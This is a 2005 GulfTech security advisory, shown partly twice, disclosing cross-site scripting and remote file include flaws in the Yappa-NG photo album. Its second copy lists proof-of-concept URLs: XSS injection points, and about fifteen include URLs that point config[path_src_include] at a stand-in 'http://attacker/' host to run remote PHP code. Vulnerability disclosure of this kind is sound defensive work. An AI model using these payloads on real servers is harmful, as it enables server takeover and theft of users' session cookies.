##########################################################
# GulfTech Security Research May 11th, 2005
##########################################################
# Vendor : Fritz Berger
# URL : http://sourceforge.net/projects/yappa-ng/
# Version : yappa-ng 2.3.1 && Earlier
# Risk : Multiple Vulnerabilities
##########################################################
Description:
Yappa-NG is the second generation (new and improved) version
of Yappa (yet another php photo album). There are several
vulnerabilities in Yappa-NG that may allow an attacker to
possibly take control of the vulnerable server. In order to
exploit these vulnerabilities register_globals must be on. An
updated version of Yappa-NG is available, and users should
upgrade as soon as possible.
Cross Site Scripting:
Cross site scripting exists in Yappa-NG. This vulnerability
exists due to user supplied input not being checked properly.
This vulnerability could be used to steal cookie based
authentication credentials within the scope of the current domain,
or render hostile code in a victim's browser.
Remote File Include Vulnerability:
Yappa-NG is prone to both remote and local file include
vulnerabilities which may allow for an attacker to execute arbitrary
commands on the victim webserver by including malicious files.
If globals are set to on, and no include restrictions are in effect then
we can include any php code of our choice remotely. Of course the server
hosting the malicious file to be included could not have php enabled, or
the file would be parsed before it reached the victim server.
This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.
Solution:
The developer was contacted quite some time ago, and a patch has been
available for several weeks. The patch can be found here.
# GulfTech Security Research May 11th, 2005
##########################################################
# Vendor : Fritz Berger
# URL : http://sourceforge.net/projects/yappa-ng/
# Version : yappa-ng 2.3.1 && Earlier
# Risk : Multiple Vulnerabilities
##########################################################
Description:
Yappa-NG is the second generation (new and improved) version
of Yappa (yet another php photo album). There are several
vulnerabilities in Yappa-NG that may allow an attacker to
possibly take control of the vulnerable server. In order to
exploit these vulnerabilities register_globals must be on. An
updated version of Yappa-NG is available, and users should
upgrade as soon as possible.
Cross Site Scripting:
Cross site scripting exists in Yappa-NG. This vulnerability
exists due to user supplied input not being checked properly.
http://host/admin_modules/admin_module_info.inc.php?lang_akt[admin_ainfo
_hmain]=[XSS]
http://host/src/index_footer-copyright.inc.php?config[release]=[XSS]
http://host/src/index_thumbs.inc.php?page[thumb_table_width]=[XSS]
This vulnerability could be used to steal cookie based
authentication credentials within the scope of the current domain,
or render hostile code in a victim's browser.
Remote File Include Vulnerability:
Yappa-NG is prone to both remote and local file include
vulnerabilities which may allow for an attacker to execute arbitrary
commands on the victim webserver by including malicious files.
http://host/admin_modules/admin_module_captions.inc.php?config[path_src_
include]=http://attacker/
http://host/admin_modules/admin_module_rotimage.inc.php?config[path_src_
include]=http://attacker/
http://host/admin_modules/admin_module_delcomments.inc.php?config[path_s
rc_include]=http://attacker/
http://host/admin_modules/admin_module_edit.inc.php?config[path_src_incl
ude]=http://attacker/
http://host/admin_modules/admin_module_delimage.inc.php?config[path_src_
include]=http://attacker/
http://host/admin_modules/admin_module_deldir.inc.php?config[path_src_in
clude]=http://attacker/
http://host/src/index_overview.inc.php?config[path_src_include]=http://a
ttacker/
http://host/src/index_leftnavbar.inc.php?config[path_src_include]=http:/
/attacker/&config[show_album_desc_prev]=yes
http://host/src/index_image.inc.php?config[path_src_include]=http://atta
cker/&config[show_comments]=1&config_album[show_comments]=1
http://host/src/image-gd.class.php?config[path_src_include]=http://attac
ker/
http://host/src/image.class.php?config[path_src_include]=http://attacker
/&config[image_module]=blah
http://host/src/album.class.php?config[path_src_include]=http://attacker
/
http://host/src/show_random.inc.php?config[path_src_include]=http://atta
cker/
http://host/src/main.inc.php?config[path_src_include]=http://attacker/
http://host/src/index_passwd-admin.inc.php?admin_ok=1&config[path_admin_
include]=http://attacker/
If globals are set to on, and no include restrictions are in effect then
we can include any php code of our choice remotely. Of course the server
hosting the malicious file to be included could not have php enabled, or
the file would be parsed before it reached the victim server.
This issue is very dangerous when present, but regardless of your server
configuration you are still encouraged to upgrade immediately.
Solution:
The developer was contacted quite some time ago, and a patch has been
available for several weeks. The patch can be found here.
https://sourceforge.net/project/showfiles.php?group_id=70802
All Yappa-NG users are advised to upgrade immediately.
Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00074-05112005
Credits:
James Bercegay of the GulfTech Security Research Team
[ reply ]